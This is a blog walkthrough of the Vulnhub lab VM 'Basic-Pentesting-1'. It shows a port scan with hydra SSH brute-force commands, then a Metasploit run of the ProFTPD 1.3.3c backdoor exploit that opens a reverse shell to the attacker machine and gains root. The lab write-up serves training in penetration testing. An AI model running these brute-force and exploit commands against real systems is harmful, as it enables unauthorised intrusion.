18 January 2022

Pentesting Fun Stuff

following the cyber security path…

Basic-Pentesting-1

This is another VM from Vulnhub (https://www.vulnhub.com/entry/basic-pentesting-1), created by Josiah Pierce.
It should be quit simple but maybe there are some tricks I can learn from.
As usual I start with Red Team Kit (RTK) for my initial scan.

██████╗ ███████╗██████╗     ████████╗███████╗ █████╗ ███╗   ███╗    ██╗  ██╗██╗████████╗
██╔══██╗██╔════╝██╔══██╗    ╚══██╔══╝██╔════╝██╔══██╗████╗ ████║    ██║ ██╔╝██║╚══██╔══╝
██████╔╝█████╗  ██║  ██║       ██║   █████╗  ███████║██╔████╔██║    █████╔╝ ██║   ██║
██╔══██╗██╔══╝  ██║  ██║       ██║   ██╔══╝  ██╔══██║██║╚██╔╝██║    ██╔═██╗ ██║   ██║
██║  ██║███████╗██████╔╝       ██║   ███████╗██║  ██║██║ ╚═╝ ██║    ██║  ██╗██║   ██║
╚═╝  ╚═╝╚══════╝╚═════╝        ╚═╝   ╚══════╝╚═╝  ╚═╝╚═╝     ╚═╝    ╚═╝  ╚═╝╚═╝   ╚═╝
Created by n0w4n
[-] Do you want to save the reports? (y/n) y
[-] Give path for saving the reports (example: /root/rtk/reports/): /root/vulnhub/basic-pentesting-1
[-] What is the IP address of the target? 192.168.100.140
[*] Checking connection to target
[*] Connection to 192.168.100.140 established
[*] Starting a Masscan to find open ports on the target
[*] This can take some time as this is for TCP and UDP
[*] Parsing output and loading up for further analysis
[*] Starting a TCP nmap scan on the target with acquired ports to retrieve all information
[*] This can take some time
[*] There are no open UDP ports
[*] Creating report
#############################################################################################
[*] Found the following open ports and services on the target:
21	tcp	  ftp ProFTPD 1.3.3c
22	tcp	  ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80	tcp	  http Apache httpd 2.4.18 ((Ubuntu))
#############################################################################################
[*] The following recommendations can be made:
[*] SSH
    Try bruteforcing with the commands:
      1.) hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.100.140 -t 4 ssh
      2.) hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -P /usr/share/wordlists/rockyou.txt 192.168.100.140 -t 4 ssh
      (If nothing else works - try this as a last resort)
[*] FTP
    Anonymous login doesn't seem to be enabled!
[*] WEB
    To enumerate the directories run the command:
      1.) python3 <path to dirsearch>/dirsearch.py -u 192.168.100.140 -e php -r -f -x 400,403,404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
back to (m)ain menu or (e)xit this program?

Looks like a FTP server, SSH server and a webserver is running.
First thing I noticed is the version number of the FTP server which has a known hard coded backdoor.

root@kali:~/vulnhub/basic-pentesting-1# searchsploit ProFTPD 1.3.3c
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                           |  Path
                                                                                                                                                                         | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution                                                                                                       | exploits/linux/remote/15662.txt
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)                                                                                                                 | exploits/linux/remote/16921.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

The webserver has a default page which has as content a notification that it works.
I have started a dirSearch in the background and fired up metasploit.

msf5 > use exploit/unix/ftp/proftpd_133c_backdoor
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   21               yes       The target port (TCP)
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > set rhosts 192.168.100.140
rhosts => 192.168.100.140
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.100.137:4444
[*] 192.168.100.140:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Kj6LuRUqdvclX5vG;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Kj6LuRUqdvclX5vG\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.100.137:4444 -> 192.168.100.140:32814) at 2019-02-13 22:22:52 +0100
id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
python -c 'import pty;pty.spawn("/bin/bash");'
root@vtcsec:/#

Well….the description stated it was for newcomers. The description states there are other ways to get in.
But I think I’m gonna put some effort in another VM.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.